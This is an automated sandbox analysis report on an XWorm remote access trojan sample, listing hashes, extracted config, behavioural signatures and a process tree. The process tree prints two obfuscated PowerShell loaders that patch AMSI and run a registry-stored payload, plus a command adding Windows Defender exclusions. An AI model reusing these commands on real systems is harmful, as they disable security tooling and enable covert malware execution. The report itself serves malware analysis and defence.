Resubmissions

21-11-2024 20:20

241121-y4nlrs1nar 10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-11-2024 20:20

General

  • Target

    1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe

  • Size

    5.8MB

  • MD5

    6192ed4726e46be98934d1e4ebebb7e3

  • SHA1

    df8badbe186b9ca3cd88bc4014a3a4aac8ac1736

  • SHA256

    1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc

  • SHA512

    b7a8f9cc0d3f214272e3b51bc02f14db11d5c2c1bb0177c31a8dca7fd1f1fa1e08aa6ec6c9b9de652455fc5fbe3abb939d0c591cece2e075adbe963fb6ca0969

  • SSDEEP

    98304:0wREfWuXTo8ToIebV6oHFE9xI6ohWhPSwVrGiGfm8EOuq2NmF:MfWW8uGY9xVoY9zELHPuqimF

Malware Config

Extracted

Family

xworm

Mutex

0LLXgeoJ4l4QFpG6

Attributes
  • install_file

    USBDriver.exe

  • pastebin_url

    https://pastebin.com/raw/FrUYqTuA

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Creates new service(s) 2 TTPs
  • Sets service image path in registry 2 TTPs 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 9 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Power Settings 1 TTPs 8 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 8 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:388
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{b1699de8-4f32-45e3-ab0b-6ecf64630960}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3088
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{e70ec9d7-1bc3-402d-9068-d27c734ea879}
          2⤵
            PID:4608
        • C:\Windows\system32\lsass.exe
          C:\Windows\system32\lsass.exe
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:668
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:944
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:432
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1048
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1104
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1120
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1172
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2672
                      • C:\ProgramData\RuntimeBroker.exe
                        C:\ProgramData\RuntimeBroker.exe
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:908
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:vmhhznKoAZol{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wfMsHxVqsHEVvd,[Parameter(Position=1)][Type]$qJZldsBijb)$ZfhcDdYSXOT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+'c'+''+'t'+''+[Char](101)+''+'d'+'D'+'e'+'l'+[Char](101)+''+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nMe'+[Char](109)+'or'+[Char](121)+'Mo'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''+'t'+''+'e'+''+'T'+''+[Char](121)+''+'p'+''+'e'+'',''+'C'+''+'l'+''+'a'+''+[Char](115)+'s,'+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+',S'+[Char](101)+''+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+'An'+[Char](115)+''+[Char](105)+''+'C'+''+'l'+'a'+[Char](115)+''+[Char](115)+',A'+[Char](117)+'t'+[Char](111)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$ZfhcDdYSXOT.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+'l'+'Na'+'m'+''+'e'+''+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+'e'+'B'+'y'+[Char](83)+''+'i'+'g'+','+''+'P'+''+'u'+'bl'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wfMsHxVqsHEVvd).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'ime'+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');$ZfhcDdYSXOT.DefineMethod('I'+[Char](110)+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','Pu'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$qJZldsBijb,$wfMsHxVqsHEVvd).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+'im'+[Char](101)+','+[Char](77)+'a'+'n'+''+[Char](97)+'g'+'e'+'d');Write-Output $ZfhcDdYSXOT.CreateType();}$itIsMBskoZDCm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+'te'+'m'+''+'.'+''+'d'+''+[Char](108)+'l')}).GetType('Mic'+[Char](114)+''+[Char](111)+''+'s'+''+'o'+'f'+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+'v'+'e'+''+[Char](77)+'et'+'h'+'o'+[Char](100)+''+'s'+'');$gMVAJHaGhcLDYV=$itIsMBskoZDCm.GetMethod(''+[Char](71)+''+'e'+'tP'+[Char](114)+'ocA'+'d'+'d'+[Char](114)+'e'+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+'t'+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$gXfdGUeBIgttgoBBFyf=vmhhznKoAZol @([String])([IntPtr]);$EgXOKGAQFPilCRucajRwKy=vmhhznKoAZol @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$EKrPAwNaSdg=$itIsMBskoZDCm.GetMethod('Get'+'M'+''+'o'+''+'d'+''+[Char](117)+'l'+'e'+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+''+'e'+''+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'')));$LHWtZBTvBGQNNJ=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$EKrPAwNaSdg,[Object]('L'+[Char](111)+'ad'+[Char](76)+''+'i'+'b'+'r'+'a'+[Char](114)+'y'+[Char](65)+'')));$IJPphyTBJZRtOjhgD=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$EKrPAwNaSdg,[Object](''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+'a'+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+[Char](116)+'')));$MpTdFHd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LHWtZBTvBGQNNJ,$gXfdGUeBIgttgoBBFyf).Invoke(''+'a'+''+[Char](109)+'s'+'i'+''+[Char](46)+'d'+'l'+'l');$vzJLyaSibLMVgtDCb=$gMVAJHaGhcLDYV.Invoke($Null,@([Object]$MpTdFHd,[Object](''+[Char](65)+'m'+[Char](115)+'i'+[Char](83)+''+[Char](99)+''+[Char](97)+'n'+[Char](66)+'u'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$mJKrJVxRzd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJPphyTBJZRtOjhgD,$EgXOKGAQFPilCRucajRwKy).Invoke($vzJLyaSibLMVgtDCb,[uint32]8,4,[ref]$mJKrJVxRzd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vzJLyaSibLMVgtDCb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IJPphyTBJZRtOjhgD,$EgXOKGAQFPilCRucajRwKy).Invoke($vzJLyaSibLMVgtDCb,[uint32]8,0x20,[ref]$mJKrJVxRzd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+''+[Char](87)+'AR'+'E'+'').GetValue('di'+[Char](97)+''+[Char](108)+''+'e'+''+'r'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4400
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AThBtDbzQKGd{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yPCdCIZhpXCDhk,[Parameter(Position=1)][Type]$RERmApxrOf)$pWlanYLjGoT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+'l'+'e'+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+'e'+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+'r'+''+'y'+'Mo'+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+','+'P'+'u'+'b'+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+'a'+'l'+''+[Char](101)+''+'d'+''+[Char](44)+''+'A'+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+'l'+'a'+'s'+[Char](115)+''+','+''+[Char](65)+''+'u'+'t'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$pWlanYLjGoT.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+'am'+'e'+','+'H'+'i'+'d'+''+[Char](101)+''+'B'+'ySi'+'g'+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$yPCdCIZhpXCDhk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+','+[Char](77)+''+[Char](97)+'na'+'g'+'e'+'d'+'');$pWlanYLjGoT.DefineMethod('I'+[Char](110)+''+'v'+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+[Char](98)+'lic'+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+'eB'+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+[Char](116)+','+[Char](86)+'i'+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$RERmApxrOf,$yPCdCIZhpXCDhk).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+'age'+'d'+'');Write-Output $pWlanYLjGoT.CreateType();}$nZhFCeZehwfYr=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'ros'+[Char](111)+''+[Char](102)+''+'t'+'.'+'W'+''+'i'+''+'n'+''+'3'+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+'e'+'N'+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+''+[Char](115)+'');$rUsHuAwHJaFjDN=$nZhFCeZehwfYr.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+'c'+'A'+''+[Char](100)+'d'+'r'+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FWSpqzQgaoKVqeZmGmL=AThBtDbzQKGd @([String])([IntPtr]);$xkHAQVitcbMWYZsxHaSKLE=AThBtDbzQKGd @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$eyURWssqOxI=$nZhFCeZehwfYr.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+[Char](111)+'d'+'u'+''+'l'+''+[Char](101)+'H'+[Char](97)+''+'n'+'d'+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+'e'+'r'+[Char](110)+''+[Char](101)+''+[Char](108)+'32'+'.'+''+'d'+'ll')));$aLpPjBuWAjKyqw=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$eyURWssqOxI,[Object](''+'L'+''+[Char](111)+'a'+'d'+''+[Char](76)+''+'i'+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$PhZIURpwWaWPSQTvz=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$eyURWssqOxI,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'P'+[Char](114)+''+[Char](111)+'t'+'e'+''+'c'+''+[Char](116)+'')));$DNzsiyf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aLpPjBuWAjKyqw,$FWSpqzQgaoKVqeZmGmL).Invoke(''+[Char](97)+''+[Char](109)+'s'+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+'l'+'');$eFaUrXnsLVGkEBmcm=$rUsHuAwHJaFjDN.Invoke($Null,@([Object]$DNzsiyf,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+'S'+[Char](99)+''+[Char](97)+''+'n'+''+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$PVYLKEjlKr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PhZIURpwWaWPSQTvz,$xkHAQVitcbMWYZsxHaSKLE).Invoke($eFaUrXnsLVGkEBmcm,[uint32]8,4,[ref]$PVYLKEjlKr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$eFaUrXnsLVGkEBmcm,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PhZIURpwWaWPSQTvz,$xkHAQVitcbMWYZsxHaSKLE).Invoke($eFaUrXnsLVGkEBmcm,[uint32]8,0x20,[ref]$PVYLKEjlKr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](100)+'i'+'a'+'l'+[Char](101)+'rs'+'t'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Command and Scripting Interpreter: PowerShell
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4988
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:2568
                        • C:\ProgramData\RuntimeBroker.exe
                          C:\ProgramData\RuntimeBroker.exe
                          2⤵
                          • Executes dropped EXE
                          PID:1276
                        • C:\ProgramData\RuntimeBroker.exe
                          C:\ProgramData\RuntimeBroker.exe
                          2⤵
                          • Executes dropped EXE
                          PID:4416
                      • C:\Windows\System32\svchost.exe
                        C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                        1⤵
                          PID:1212
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                          1⤵
                            PID:1244
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                            1⤵
                              PID:1284
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                              1⤵
                                PID:1332
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1444
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                      PID:2488
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                    1⤵
                                      PID:1452
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1520
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                        1⤵
                                          PID:1528
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1668
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                            1⤵
                                              PID:1688
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                              1⤵
                                                PID:1732
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                  PID:1796
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                                  1⤵
                                                    PID:1804
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1924
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1944
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1980
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:2016
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2064
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2208
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2232
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                  1⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2284
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                  1⤵
                                                                    PID:2524
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2636
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                      1⤵
                                                                        PID:2644
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                        1⤵
                                                                        • Drops file in System32 directory
                                                                        • Modifies data under HKEY_USERS
                                                                        PID:2692
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                        1⤵
                                                                          PID:2728
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                          1⤵
                                                                            PID:2776
                                                                          • C:\Windows\sysmon.exe
                                                                            C:\Windows\sysmon.exe
                                                                            1⤵
                                                                              PID:2812
                                                                            • C:\Windows\System32\svchost.exe
                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                              1⤵
                                                                                PID:2836
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                                1⤵
                                                                                  PID:2848
                                                                                • C:\Windows\system32\wbem\unsecapp.exe
                                                                                  C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                  1⤵
                                                                                    PID:2156
                                                                                  • C:\Windows\system32\svchost.exe
                                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                    1⤵
                                                                                      PID:3268
                                                                                    • C:\Windows\Explorer.EXE
                                                                                      C:\Windows\Explorer.EXE
                                                                                      1⤵
                                                                                        PID:3388
                                                                                        • C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe"
                                                                                          2⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4964
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-29HGF.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-29HGF.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp" /SL5="$502D4,5022309,876544,C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe"
                                                                                            3⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:1116
                                                                                            • C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe" /VERYSILENT
                                                                                              4⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:4600
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-AVIIP.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-AVIIP.tmp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.tmp" /SL5="$602D6,5022309,876544,C:\Users\Admin\AppData\Local\Temp\1c1510d9d6c4c46067dbb55056a720bc9e69ac47a4e66c6765886a25d4f6d4cc.exe" /VERYSILENT
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                • Drops file in Windows directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:2968
                                                                                                • C:\Windows\planet.exe
                                                                                                  "C:\Windows\planet.exe" /verysilent
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Drops file in System32 directory
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:1436
                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                    7⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
